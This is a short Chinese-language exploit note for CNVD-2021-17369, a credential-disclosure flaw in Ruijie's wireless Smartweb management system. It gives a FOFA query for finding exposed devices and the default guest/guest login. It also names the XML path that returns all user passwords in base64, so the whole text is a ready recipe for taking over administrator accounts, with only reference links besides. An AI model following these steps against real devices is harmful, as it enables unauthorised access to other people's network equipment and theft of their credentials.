# 锐捷Smartweb管理系统 密码信息泄露 CNVD-2021-17369
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
FOFA:
`title="无线smartWeb--登录页面"`
默认guest账户密码:guest/guest
登录后访问:`http://target/web/xml/webuser-auth.xml`
获取所有用户账号密码,base64解码即可。
ref:
* https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ
* https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369